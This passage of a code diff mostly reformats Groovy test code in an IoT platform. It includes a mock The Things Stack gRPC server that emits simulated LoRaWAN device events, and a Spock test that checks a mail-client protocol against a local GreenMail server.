-            server = ServerBuilder.forPort(port)
-                .addService(new DeviceService())
-                .addService(eventsService)
-                .build()
-                .start()
-        }
-
-        void stop() {
-            if (server != null) {
-                server.shutdownNow()
-            }
-        }
-
-        void pushEvent(Event event) {
-            eventsService.pushEvent(event)
-        }
-
-        int getEventObserverCount() {
-            eventsService.eventObservers.size()
-        }
-
-        void shutdownEventStream() {
-            eventsService.completeAll()
-        }
-
-        private static class DeviceService extends EndDeviceRegistryGrpc.EndDeviceRegistryImplBase {
-
-            @Override
-            void list(ListEndDevicesRequest request, StreamObserver<EndDevices> responseObserver) {
-                EndDeviceIdentifiers identifiers1 = EndDeviceIdentifiers.newBuilder()
-                    .setApplicationIds(ApplicationIdentifiers.newBuilder().setApplicationId(APPLICATION_ID))
-                    .setDeviceId(DEVICE_ID_1)
-                    .setDevEui(ByteString.copyFrom(DEV_EUI_1.decodeHex()))
-                    .build()
-
-                EndDevice device1 = EndDevice.newBuilder()
-                    .setIds(identifiers1)
-                    .setName("Device 1")
-                    .putAttributes(THE_THINGS_STACK_ASSET_TYPE_TAG, "TheThingsStackTestAsset")
-                    .build()
-
-                EndDeviceIdentifiers identifiers2 = EndDeviceIdentifiers.newBuilder()
-                    .setApplicationIds(ApplicationIdentifiers.newBuilder().setApplicationId(APPLICATION_ID))
-                    .setDeviceId(DEVICE_ID_2)
-                    .setDevEui(ByteString.copyFrom(DEV_EUI_2.decodeHex()))
-                    .build()
-
-                EndDevice device2 = EndDevice.newBuilder()
-                    .setIds(identifiers2)
-                    .setName("Device 2")
-                    .putAttributes(THE_THINGS_STACK_ASSET_TYPE_TAG, "TheThingsStackTestAsset")
-                    .build()
-
-                EndDevices response = EndDevices.newBuilder()
-                    .addEndDevices(device1)
-                    .addEndDevices(device2)
-                    .build()
-
-                responseObserver.onNext(response)
-                responseObserver.onCompleted()
-            }
-
-            @Override
-            void get(GetEndDeviceRequest request, StreamObserver<EndDevice> responseObserver) {
-                def deviceId = request.getEndDeviceIds().getDeviceId()
-
-                if (deviceId == DEVICE_ID_1) {
-                    EndDeviceIdentifiers identifiers1 = EndDeviceIdentifiers.newBuilder()
-                        .setApplicationIds(ApplicationIdentifiers.newBuilder().setApplicationId(APPLICATION_ID))
-                        .setDeviceId(DEVICE_ID_1)
-                        .setDevEui(ByteString.copyFrom(DEV_EUI_1.decodeHex()))
-                        .build()
-
-                    EndDevice device1 = EndDevice.newBuilder()
-                        .setIds(identifiers1)
-                        .setName("Device 1")
-                        .putAttributes(THE_THINGS_STACK_ASSET_TYPE_TAG, "TheThingsStackTestAsset")
-                        .build()
-
-                    responseObserver.onNext(device1)
-                    responseObserver.onCompleted()
-                } else if (deviceId == DEVICE_ID_2) {
-                    EndDeviceIdentifiers identifiers2 = EndDeviceIdentifiers.newBuilder()
-                        .setApplicationIds(ApplicationIdentifiers.newBuilder().setApplicationId(APPLICATION_ID))
-                        .setDeviceId(DEVICE_ID_2)
-                        .setDevEui(ByteString.copyFrom(DEV_EUI_2.decodeHex()))
-                        .build()
-
-                    EndDevice device2 = EndDevice.newBuilder()
-                        .setIds(identifiers2)
-                        .setName("Device 2")
-                        .putAttributes(THE_THINGS_STACK_ASSET_TYPE_TAG, "TheThingsStackTestAsset")
-                        .build()
-
-                    responseObserver.onNext(device2)
-                    responseObserver.onCompleted()
-                } else {
-                    responseObserver.onError(new StatusRuntimeException(Status.NOT_FOUND))
-                }
-            }
-        }
-
-        private static class EventsService extends EventsGrpc.EventsImplBase {
-            private final List<StreamObserver<Event>> eventObservers = new CopyOnWriteArrayList<>()
-
-            @Override
-            void stream(StreamEventsRequest request, StreamObserver<Event> responseObserver) {
-                eventObservers.add(responseObserver)
-            }
-
-            void pushEvent(Event event) {
-                eventObservers.removeIf { observer ->
-                    try {
-                        observer.onNext(event)
-                        return false
-                    } catch (Exception e) {
-                        return true
-                    }
-                }
-            }
-
-            void completeAll() {
-                eventObservers.each {it.onCompleted()}
-                eventObservers.clear()
-            }
-        }
-
-        static Event createStreamStartEvent(String applicationId) {
-            def applicationIds = ApplicationIdentifiers.newBuilder()
-                .setApplicationId(applicationId)
-                .build()
-
-            def entityIds = EntityIdentifiers.newBuilder()
-                .setApplicationIds(applicationIds)
-                .build()
-
-            def anyPayload = Any.pack(com.google.protobuf.Empty.getDefaultInstance())
-
-            return Event.newBuilder()
-                .setName("events.stream.start")
-                .addIdentifiers(entityIds)
-                .setData(anyPayload)
-                .build()
-        }
-
-        static Event createUplinkEvent(String applicationId, String deviceId, String devEui, String payloadData, int fPort, int fCnt) {
-            def devEuiBytes = ByteString.copyFrom(devEui.decodeHex())
-            def frmPayloadBytes = ByteString.copyFrom(payloadData.decodeHex())
-            def uniqueCorrelationId = "mock-corr-id-${System.currentTimeMillis()}-${(int)(Math.random() * 1000)}"
-
-            def applicationIds = ApplicationIdentifiers.newBuilder()
-                .setApplicationId(applicationId)
-                .build()
-
-            def endDeviceIds = EndDeviceIdentifiers.newBuilder()
-                .setApplicationIds(applicationIds)
-                .setDeviceId(deviceId)
-                .setDevEui(devEuiBytes)
-                .build()
-
-            def entityIds = EntityIdentifiers.newBuilder()
-                .setDeviceIds(endDeviceIds)
-                .build()
-
-            def loraDataRate = Lorawan.LoRaDataRate.newBuilder()
-                .setBandwidth(125000)
-                .setSpreadingFactor(7)
-                .build()
-
-            def dataRate = Lorawan.DataRate.newBuilder()
-                .setLora(loraDataRate)
-                .build()
-
-            def txSettings = Lorawan.TxSettings.newBuilder()
-                .setDataRate(dataRate)
-                .setFrequency(868100000)
-                .build()
-
-            def rxMetadata = Metadata.RxMetadata.newBuilder()
-                .setGatewayIds(GatewayIdentifiers.newBuilder().setGatewayId("mock-gateway-1"))
-                .setRssi(-50)
-                .setSnr(10)
-                .build()
-
-            def applicationUplink = Messages.ApplicationUplink.newBuilder()
-                .setFPort(fPort)
-                .setFCnt(fCnt)
-                .setFrmPayload(frmPayloadBytes)
-                .setSettings(txSettings)
-                .addRxMetadata(rxMetadata)
-                .setReceivedAt(Timestamp.newBuilder().setSeconds((System.currentTimeMillis() / 1000) as long))
-                .setConsumedAirtime(Duration.newBuilder().setNanos(50000000))
-                .setConfirmed(false)
-                .build()
-
-            def applicationUp = Messages.ApplicationUp.newBuilder()
-                .setEndDeviceIds(endDeviceIds)
-                .setUplinkMessage(applicationUplink)
-                .addCorrelationIds(uniqueCorrelationId)
-                .build()
-
-            def anyPayload = Any.pack(applicationUp)
-
-            return Event.newBuilder()
-                .setName("as.up.data.forward")
-                .addCorrelationIds(uniqueCorrelationId)
-                .addIdentifiers(entityIds)
-                .setData(anyPayload)
-                .build()
-        }
-
-        static Event createEndDeviceCreateEvent(String applicationId, String deviceId, String devEui) {
-            def devEuiBytes = ByteString.copyFrom(devEui.decodeHex())
-
-            def applicationIds = ApplicationIdentifiers.newBuilder()
-                .setApplicationId(applicationId)
-                .build()
-
-            def endDeviceIds = EndDeviceIdentifiers.newBuilder()
-                .setApplicationIds(applicationIds)
-                .setDeviceId(deviceId)
-                .setDevEui(devEuiBytes)
-                .build()
-
-            def entityIds = EntityIdentifiers.newBuilder()
-                .setDeviceIds(endDeviceIds)
-                .build()
-
-            def endDevice = EndDevice.newBuilder()
-                .setIds(endDeviceIds)
-                .build()
-
-            def anyPayload = Any.pack(endDevice)
-
-            return Event.newBuilder()
-                .setName("end_device.create")
-                .addIdentifiers(entityIds)
-                .setData(anyPayload)
-                .build()
-        }
+    void pushEvent(Event event) {
+      eventsService.pushEvent(event)
     }
 
-    static class SubscriptionTracker extends AbstractInterceptHandler {
-        static final Logger LOG = Logger.getLogger(SubscriptionTracker.class.getName())
-        final Set<String> subscriptions = new CopyOnWriteArraySet<>()
-
-        @Override
-        String getID() { "SubscriptionTracker" }
-
-        @Override
-        void onSubscribe(InterceptSubscribeMessage msg) {
-            subscriptions.add(msg.getTopicFilter())
-        }
-
-        @Override
-        void onUnsubscribe(InterceptUnsubscribeMessage msg) {
-            subscriptions.remove(msg.getTopicFilter())
-        }
-
-        @Override
-        void onSessionLoopError(Throwable throwable) {
-            LOG.log(Level.SEVERE, "MQTT session loop error in SubscriptionTracker", throwable)
-        }
-
-        boolean containsTopic(String topic) {
-            return subscriptions.contains(topic)
-        }
+    int getEventObserverCount() {
+      eventsService.eventObservers.size()
     }
+
+    void shutdownEventStream() {
+      eventsService.completeAll()
+    }
+
+    private static class DeviceService extends EndDeviceRegistryGrpc.EndDeviceRegistryImplBase {
+
+      @Override
+      void list(ListEndDevicesRequest request, StreamObserver<EndDevices> responseObserver) {
+        EndDeviceIdentifiers identifiers1 = EndDeviceIdentifiers.newBuilder()
+                .setApplicationIds(ApplicationIdentifiers.newBuilder().setApplicationId(APPLICATION_ID))
+                .setDeviceId(DEVICE_ID_1)
+                .setDevEui(ByteString.copyFrom(DEV_EUI_1.decodeHex()))
+                .build()
+
+        EndDevice device1 = EndDevice.newBuilder()
+                .setIds(identifiers1)
+                .setName("Device 1")
+                .putAttributes(THE_THINGS_STACK_ASSET_TYPE_TAG, "TheThingsStackTestAsset")
+                .build()
+
+        EndDeviceIdentifiers identifiers2 = EndDeviceIdentifiers.newBuilder()
+                .setApplicationIds(ApplicationIdentifiers.newBuilder().setApplicationId(APPLICATION_ID))
+                .setDeviceId(DEVICE_ID_2)
+                .setDevEui(ByteString.copyFrom(DEV_EUI_2.decodeHex()))
+                .build()
+
+        EndDevice device2 = EndDevice.newBuilder()
+                .setIds(identifiers2)
+                .setName("Device 2")
+                .putAttributes(THE_THINGS_STACK_ASSET_TYPE_TAG, "TheThingsStackTestAsset")
+                .build()
+
+        EndDevices response = EndDevices.newBuilder()
+                .addEndDevices(device1)
+                .addEndDevices(device2)
+                .build()
+
+        responseObserver.onNext(response)
+        responseObserver.onCompleted()
+      }
+
+      @Override
+      void get(GetEndDeviceRequest request, StreamObserver<EndDevice> responseObserver) {
+        def deviceId = request.getEndDeviceIds().getDeviceId()
+
+        if (deviceId == DEVICE_ID_1) {
+          EndDeviceIdentifiers identifiers1 = EndDeviceIdentifiers.newBuilder()
+                  .setApplicationIds(ApplicationIdentifiers.newBuilder().setApplicationId(APPLICATION_ID))
+                  .setDeviceId(DEVICE_ID_1)
+                  .setDevEui(ByteString.copyFrom(DEV_EUI_1.decodeHex()))
+                  .build()
+
+          EndDevice device1 = EndDevice.newBuilder()
+                  .setIds(identifiers1)
+                  .setName("Device 1")
+                  .putAttributes(THE_THINGS_STACK_ASSET_TYPE_TAG, "TheThingsStackTestAsset")
+                  .build()
+
+          responseObserver.onNext(device1)
+          responseObserver.onCompleted()
+        } else if (deviceId == DEVICE_ID_2) {
+          EndDeviceIdentifiers identifiers2 = EndDeviceIdentifiers.newBuilder()
+                  .setApplicationIds(ApplicationIdentifiers.newBuilder().setApplicationId(APPLICATION_ID))
+                  .setDeviceId(DEVICE_ID_2)
+                  .setDevEui(ByteString.copyFrom(DEV_EUI_2.decodeHex()))
+                  .build()
+
+          EndDevice device2 = EndDevice.newBuilder()
+                  .setIds(identifiers2)
+                  .setName("Device 2")
+                  .putAttributes(THE_THINGS_STACK_ASSET_TYPE_TAG, "TheThingsStackTestAsset")
+                  .build()
+
+          responseObserver.onNext(device2)
+          responseObserver.onCompleted()
+        } else {
+          responseObserver.onError(new StatusRuntimeException(Status.NOT_FOUND))
+        }
+      }
+    }
+
+    private static class EventsService extends EventsGrpc.EventsImplBase {
+      private final List<StreamObserver<Event>> eventObservers = new CopyOnWriteArrayList<>()
+
+      @Override
+      void stream(StreamEventsRequest request, StreamObserver<Event> responseObserver) {
+        eventObservers.add(responseObserver)
+      }
+
+      void pushEvent(Event event) {
+        eventObservers.removeIf { observer ->
+          try {
+            observer.onNext(event)
+            return false
+          } catch (Exception e) {
+            return true
+          }
+        }
+      }
+
+      void completeAll() {
+        eventObservers.each {it.onCompleted()}
+        eventObservers.clear()
+      }
+    }
+
+    static Event createStreamStartEvent(String applicationId) {
+      def applicationIds = ApplicationIdentifiers.newBuilder()
+              .setApplicationId(applicationId)
+              .build()
+
+      def entityIds = EntityIdentifiers.newBuilder()
+              .setApplicationIds(applicationIds)
+              .build()
+
+      def anyPayload = Any.pack(com.google.protobuf.Empty.getDefaultInstance())
+
+      return Event.newBuilder()
+              .setName("events.stream.start")
+              .addIdentifiers(entityIds)
+              .setData(anyPayload)
+              .build()
+    }
+
+    static Event createUplinkEvent(String applicationId, String deviceId, String devEui, String payloadData, int fPort, int fCnt) {
+      def devEuiBytes = ByteString.copyFrom(devEui.decodeHex())
+      def frmPayloadBytes = ByteString.copyFrom(payloadData.decodeHex())
+      def uniqueCorrelationId = "mock-corr-id-${System.currentTimeMillis()}-${(int)(Math.random() * 1000)}"
+
+      def applicationIds = ApplicationIdentifiers.newBuilder()
+              .setApplicationId(applicationId)
+              .build()
+
+      def endDeviceIds = EndDeviceIdentifiers.newBuilder()
+              .setApplicationIds(applicationIds)
+              .setDeviceId(deviceId)
+              .setDevEui(devEuiBytes)
+              .build()
+
+      def entityIds = EntityIdentifiers.newBuilder()
+              .setDeviceIds(endDeviceIds)
+              .build()
+
+      def loraDataRate = Lorawan.LoRaDataRate.newBuilder()
+              .setBandwidth(125000)
+              .setSpreadingFactor(7)
+              .build()
+
+      def dataRate = Lorawan.DataRate.newBuilder()
+              .setLora(loraDataRate)
+              .build()
+
+      def txSettings = Lorawan.TxSettings.newBuilder()
+              .setDataRate(dataRate)
+              .setFrequency(868100000)
+              .build()
+
+      def rxMetadata = Metadata.RxMetadata.newBuilder()
+              .setGatewayIds(GatewayIdentifiers.newBuilder().setGatewayId("mock-gateway-1"))
+              .setRssi(-50)
+              .setSnr(10)
+              .build()
+
+      def applicationUplink = Messages.ApplicationUplink.newBuilder()
+              .setFPort(fPort)
+              .setFCnt(fCnt)
+              .setFrmPayload(frmPayloadBytes)
+              .setSettings(txSettings)
+              .addRxMetadata(rxMetadata)
+              .setReceivedAt(Timestamp.newBuilder().setSeconds((System.currentTimeMillis() / 1000) as long))
+              .setConsumedAirtime(Duration.newBuilder().setNanos(50000000))
+              .setConfirmed(false)
+              .build()
+
+      def applicationUp = Messages.ApplicationUp.newBuilder()
+              .setEndDeviceIds(endDeviceIds)
+              .setUplinkMessage(applicationUplink)
+              .addCorrelationIds(uniqueCorrelationId)
+              .build()
+
+      def anyPayload = Any.pack(applicationUp)
+
+      return Event.newBuilder()
+              .setName("as.up.data.forward")
+              .addCorrelationIds(uniqueCorrelationId)
+              .addIdentifiers(entityIds)
+              .setData(anyPayload)
+              .build()
+    }
+
+    static Event createEndDeviceCreateEvent(String applicationId, String deviceId, String devEui) {
+      def devEuiBytes = ByteString.copyFrom(devEui.decodeHex())
+
+      def applicationIds = ApplicationIdentifiers.newBuilder()
+              .setApplicationId(applicationId)
+              .build()
+
+      def endDeviceIds = EndDeviceIdentifiers.newBuilder()
+              .setApplicationIds(applicationIds)
+              .setDeviceId(deviceId)
+              .setDevEui(devEuiBytes)
+              .build()
+
+      def entityIds = EntityIdentifiers.newBuilder()
+              .setDeviceIds(endDeviceIds)
+              .build()
+
+      def endDevice = EndDevice.newBuilder()
+              .setIds(endDeviceIds)
+              .build()
+
+      def anyPayload = Any.pack(endDevice)
+
+      return Event.newBuilder()
+              .setName("end_device.create")
+              .addIdentifiers(entityIds)
+              .setData(anyPayload)
+              .build()
+    }
+  }
+
+  static class SubscriptionTracker extends AbstractInterceptHandler {
+    static final Logger LOG = Logger.getLogger(SubscriptionTracker.class.getName())
+    final Set<String> subscriptions = new CopyOnWriteArraySet<>()
+
+    @Override
+    String getID() {
+      "SubscriptionTracker"
+    }
+
+    @Override
+    void onSubscribe(InterceptSubscribeMessage msg) {
+      subscriptions.add(msg.getTopicFilter())
+    }
+
+    @Override
+    void onUnsubscribe(InterceptUnsubscribeMessage msg) {
+      subscriptions.remove(msg.getTopicFilter())
+    }
+
+    @Override
+    void onSessionLoopError(Throwable throwable) {
+      LOG.log(Level.SEVERE, "MQTT session loop error in SubscriptionTracker", throwable)
+    }
+
+    boolean containsTopic(String topic) {
+      return subscriptions.contains(topic)
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/mail/MailClientProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/mail/MailClientProtocolTest.groovy
@@ -54,77 +54,77 @@ import static org.openremote.model.value.ValueType.TEXT
 
 class MailClientProtocolTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    static GreenMail greenMail
-    @Shared
-    static int messageCounter
-    @Shared
-    static GreenMailUser user
+  @Shared
+  static GreenMail greenMail
+  @Shared
+  static int messageCounter
+  @Shared
+  static GreenMailUser user
 
 
-    def setupSpec() {
-        MailClientBuilder.MIN_CHECK_INTERVAL_SECONDS = 2
-        AbstractMailProtocol.INITIAL_CHECK_DELAY_SECONDS = 2
-        greenMail = new GreenMail(ServerSetupTest.ALL)
-        greenMail.start()
-        user = greenMail.setUser("or@localhost", "or", "secret")
+  def setupSpec() {
+    MailClientBuilder.MIN_CHECK_INTERVAL_SECONDS = 2
+    AbstractMailProtocol.INITIAL_CHECK_DELAY_SECONDS = 2
+    greenMail = new GreenMail(ServerSetupTest.ALL)
+    greenMail.start()
+    user = greenMail.setUser("or@localhost", "or", "secret")
+  }
+
+  def cleanupSpec() {
+    if (greenMail != null) {
+      greenMail.stop()
     }
+  }
 
-    def cleanupSpec() {
-        if (greenMail != null) {
-            greenMail.stop()
-        }
+  def sendMessage(String fromAddress) {
+    def subject = "Test Message ${++messageCounter}"
+    def body = "Test body ${messageCounter}"
+    MimeMessage message = GreenMailUtil.createTextEmail("to@localhost", fromAddress, subject, body, greenMail.getImap().getServerSetup())
+    message.addHeader("Test-Header", "Test Header Value")
+    user.deliver(message)
+  }
+
+  def sendMessage(String fromAddress, String subject, String body) {
+    MimeMessage message = GreenMailUtil.createTextEmail("to@localhost", fromAddress, subject, body, greenMail.getImap().getServerSetup())
+    message.addHeader("Test-Header", "Test Header Value")
+    user.deliver(message)
+  }
+
+  def "Basic agent and attribute linking"() {
+
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 30, delay: 0.2)
+
+    and: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+    def clientEventService = container.getService(ClientEventService.class)
+    ThingAsset asset = null
+    def attributeEvents = new CopyOnWriteArrayList<AttributeEvent>()
+    Consumer<AttributeEvent> eventConsumer = it -> {
+      LOG.debug("Attribute event received: " + it)
+      attributeEvents.add(it)
     }
-
-    def sendMessage(String fromAddress) {
-        def subject = "Test Message ${++messageCounter}"
-        def body = "Test body ${messageCounter}"
-        MimeMessage message = GreenMailUtil.createTextEmail("to@localhost", fromAddress, subject, body, greenMail.getImap().getServerSetup())
-        message.addHeader("Test-Header", "Test Header Value")
-        user.deliver(message)
+    Consumer<OutdatedAttributeEvent> outdatedEventConsumer = it -> {
+      LOG.debug("Outdated attribute event received: " + it)
+      attributeEvents.add(it.event)
     }
+    clientEventService.addSubscription(AttributeEvent.class, null, eventConsumer)
+    clientEventService.addSubscription(OutdatedAttributeEvent.class, null, outdatedEventConsumer)
 
-    def sendMessage(String fromAddress, String subject, String body) {
-        MimeMessage message = GreenMailUtil.createTextEmail("to@localhost", fromAddress, subject, body, greenMail.getImap().getServerSetup())
-        message.addHeader("Test-Header", "Test Header Value")
-        user.deliver(message)
-    }
+    and: "some mail messages exist"
+    sendMessage("from@localhost")
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    sendMessage("from@localhost")
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    sendMessage("from@localhost")
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
 
-    def "Basic agent and attribute linking"() {
-
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 30, delay: 0.2)
-
-        and: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-        def clientEventService = container.getService(ClientEventService.class)
-        ThingAsset asset = null
-        def attributeEvents = new CopyOnWriteArrayList<AttributeEvent>()
-        Consumer<AttributeEvent> eventConsumer = it -> {
-            LOG.debug("Attribute event received: " + it)
-            attributeEvents.add(it)
-        }
-        Consumer<OutdatedAttributeEvent> outdatedEventConsumer = it -> {
-            LOG.debug("Outdated attribute event received: " + it)
-            attributeEvents.add(it.event)
-        }
-        clientEventService.addSubscription(AttributeEvent.class, null, eventConsumer)
-        clientEventService.addSubscription(OutdatedAttributeEvent.class, null, outdatedEventConsumer)
-
-        and: "some mail messages exist"
-        sendMessage("from@localhost")
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        sendMessage("from@localhost")
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        sendMessage("from@localhost")
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-
-        when: "a mail client agent is created"
-        def agent = new MailAgent("Test agent")
-        agent.setRealm(Constants.MASTER_REALM)
+    when: "a mail client agent is created"
+    def agent = new MailAgent("Test agent")
+    agent.setRealm(Constants.MASTER_REALM)
             .setProtocol("pop3")
             .setHost("127.0.0.1")
             .setPort(greenMail.getPop3().getServerSetup().getPort())
@@ -132,121 +132,149 @@ class MailClientProtocolTest extends Specification implements ManagerContainerTr
             .setCheckIntervalSeconds(2)
             .setDisabled(true)
 
-        and: "the agent is added to the asset service"
-        agent = assetStorageService.merge(agent)
+    and: "the agent is added to the asset service"
+    agent = assetStorageService.merge(agent)
 
-        and: "an asset is created with attributes linked to the agent"
-        asset = new ThingAsset("Test Asset")
-                .setId(UniqueIdentifierGenerator.generateId("MailTestAsset"))
-                .setParent(agent)
-                .addOrReplaceAttributes(
-                        new Attribute<>("fromMatchUseBody", TEXT)
-                                .addMeta(
-                                        new MetaItem<>(AGENT_LINK, new MailAgentLink(agent.id)
-                                            .setFromMatchPredicate(new StringPredicate("from@localhost"))
-                                        )
-                                ),
-                        new Attribute<>("subjectMatchUseBody", TEXT)
-                                .addMeta(
-                                        new MetaItem<>(AGENT_LINK, new MailAgentLink(agent.id)
-                                                .setSubjectMatchPredicate(new StringPredicate("Not A Test"))
-                                        )
-                                ),
-                        new Attribute<>("subjectAndFromMatchUseBody", TEXT)
-                                .addMeta(
-                                        new MetaItem<>(AGENT_LINK, new MailAgentLink(agent.id)
-                                                .setFromMatchPredicate(new StringPredicate("fromanother@localhost"))
-                                                .setSubjectMatchPredicate(new StringPredicate("Not A Test"))
-                                        )
-                                ),
-                        new Attribute<>("fromMatchUseSubject", TEXT)
-                                .addMeta(
-                                        new MetaItem<>(AGENT_LINK, new MailAgentLink(agent.id)
-                                                .setFromMatchPredicate(new StringPredicate("from@localhost"))
-                                                .setUseSubject(true)
-                                        )
-                                )
-                )
+    and: "an asset is created with attributes linked to the agent"
+    asset = new ThingAsset("Test Asset")
+            .setId(UniqueIdentifierGenerator.generateId("MailTestAsset"))
+            .setParent(agent)
+            .addOrReplaceAttributes(
+            new Attribute<>("fromMatchUseBody", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MailAgentLink(agent.id)
+                    .setFromMatchPredicate(new StringPredicate("from@localhost"))
+                    )
+                    ),
+            new Attribute<>("subjectMatchUseBody", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MailAgentLink(agent.id)
+                    .setSubjectMatchPredicate(new StringPredicate("Not A Test"))
+                    )
+                    ),
+            new Attribute<>("subjectAndFromMatchUseBody", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MailAgentLink(agent.id)
+                    .setFromMatchPredicate(new StringPredicate("fromanother@localhost"))
+                    .setSubjectMatchPredicate(new StringPredicate("Not A Test"))
+                    )
+                    ),
+            new Attribute<>("fromMatchUseSubject", TEXT)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new MailAgentLink(agent.id)
+                    .setFromMatchPredicate(new StringPredicate("from@localhost"))
+                    .setUseSubject(true)
+                    )
+                    )
+            )
 
-        and: "the asset is merged into the asset service"
-        asset = assetStorageService.merge(asset)
+    and: "the asset is merged into the asset service"
+    asset = assetStorageService.merge(asset)
 
-        then: "attribute events for the new asset should arrive"
-        conditions.eventually {
-            assert attributeEvents.count {it.id == asset.id} == 6
-        }
-
-        when: "the attribute events are cleared"
-        attributeEvents.clear()
-
-        and: "the agent is enabled"
-        agent.setDisabled(false)
-        agent = assetStorageService.merge(agent)
-
-        then: "the attributes should be linked"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 4
-            assert ((MailProtocol)agentService.getProtocolInstance(agent.id)).attributeMessageProcessorMap.size() == 4
-        }
-
-        then: "the agent should become connected"
-        conditions.eventually {
-            assert attributeEvents.any {it.id == agent.id && it.name == Agent.STATUS.name && it.value.orElse(null) == ConnectionStatus.CONNECTED}
-        }
-
-        then: "the agent should have finished message checking"
-        conditions.eventually {
-            assert attributeEvents.any {it.id == agent.id && it.name == Agent.STATUS.name && it.value.orElse(null) == ConnectionStatus.WAITING}
-        }
-
-        then: "the linked attributes should not have been updated with mailbox messages (as creation time of agent is after message timestamps)"
-        conditions.eventually {
-            assert attributeEvents.count {it.id == asset.id} == 0
-        }
-
-        when: "more messages are received in the mailbox"
-        sendMessage("from@localhost")
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        sendMessage("1from@localhost")
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        sendMessage("from@localhost")
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        sendMessage("from@localhost", "Not A Test", "Not a test body 1")
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        sendMessage("fromanother@localhost", "Not A Test", "Not a test body 2")
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-
-        then: "the matching linked attributes should have been updated with the new mailbox messages"
-        conditions.eventually {
-            assert attributeEvents.count {it.id == asset.id && it.name == "fromMatchUseBody" && (it.value.orElse(null) as String).startsWith("Test body")} == 2
-            assert attributeEvents.count {it.id == asset.id && it.name == "fromMatchUseBody" && (it.value.orElse(null) as String).startsWith("Not a test body")} == 1
-            assert attributeEvents.count {it.id == asset.id && it.name == "fromMatchUseSubject" && (it.value.orElse(null) as String).startsWith("Test Message")} == 2
-            assert attributeEvents.count {it.id == asset.id && it.name == "fromMatchUseSubject" && it.value.orElse(null) == "Not A Test"} == 1
-            assert attributeEvents.count {it.id == asset.id && it.name == "subjectMatchUseBody" && (it.value.orElse(null) as String).startsWith("Not a test body")} == 2
-            assert attributeEvents.count {it.id == asset.id && it.name == "subjectAndFromMatchUseBody" && it.value.orElse(null) == "Not a test body 2"} == 1
-        }
-
-        when: "more messages are received in the mailbox"
-        sendMessage("fromanother@localhost", "Really Not A Test", "Really not a test body 1")
-        sendMessage("fromanotheranother@localhost", "Not A Test", "Not a test body 3")
-
-        then: "the matching linked attributes should have been updated with the new mailbox messages"
-        conditions.eventually {
-            assert attributeEvents.count {it.id == asset.id && it.name == "fromMatchUseBody" && (it.value.orElse(null) as String).startsWith("Test body")} == 2
-            assert attributeEvents.count {it.id == asset.id && it.name == "fromMatchUseBody" && (it.value.orElse(null) as String).startsWith("Not a test body")} == 1
-            assert attributeEvents.count {it.id == asset.id && it.name == "fromMatchUseSubject" && (it.value.orElse(null) as String).startsWith("Test Message")} == 2
-            assert attributeEvents.count {it.id == asset.id && it.name == "fromMatchUseSubject" && it.value.orElse(null) == "Not A Test"} == 1
-            assert attributeEvents.count {it.id == asset.id && it.name == "subjectMatchUseBody" && (it.value.orElse(null) as String).startsWith("Not a test body")} == 3
-            assert attributeEvents.count {it.id == asset.id && it.name == "subjectAndFromMatchUseBody" && (it.value.orElse(null) as String).startsWith("Not a test body")} == 1
-        }
-
-        cleanup: "the event subscription is removed"
-        if (clientEventService != null) {
-            clientEventService.removeSubscription(eventConsumer)
-            clientEventService.removeSubscription {outdatedEventConsumer}
-        }
-        if (asset != null) {
-            assetStorageService.delete([agent.id, asset.id])
-        }
+    then: "attribute events for the new asset should arrive"
+    conditions.eventually {
+      assert attributeEvents.count {it.id == asset.id} == 6
     }
+
+    when: "the attribute events are cleared"
+    attributeEvents.clear()
+
+    and: "the agent is enabled"
+    agent.setDisabled(false)
+    agent = assetStorageService.merge(agent)
+
+    then: "the attributes should be linked"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 4
+      assert ((MailProtocol)agentService.getProtocolInstance(agent.id)).attributeMessageProcessorMap.size() == 4
+    }
+
+    then: "the agent should become connected"
+    conditions.eventually {
+      assert attributeEvents.any {
+        it.id == agent.id && it.name == Agent.STATUS.name && it.value.orElse(null) == ConnectionStatus.CONNECTED
+      }
+    }
+
+    then: "the agent should have finished message checking"
+    conditions.eventually {
+      assert attributeEvents.any {
+        it.id == agent.id && it.name == Agent.STATUS.name && it.value.orElse(null) == ConnectionStatus.WAITING
+      }
+    }
+
+    then: "the linked attributes should not have been updated with mailbox messages (as creation time of agent is after message timestamps)"
+    conditions.eventually {
+      assert attributeEvents.count {it.id == asset.id} == 0
+    }
+
+    when: "more messages are received in the mailbox"
+    sendMessage("from@localhost")
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    sendMessage("1from@localhost")
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    sendMessage("from@localhost")
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    sendMessage("from@localhost", "Not A Test", "Not a test body 1")
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    sendMessage("fromanother@localhost", "Not A Test", "Not a test body 2")
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+
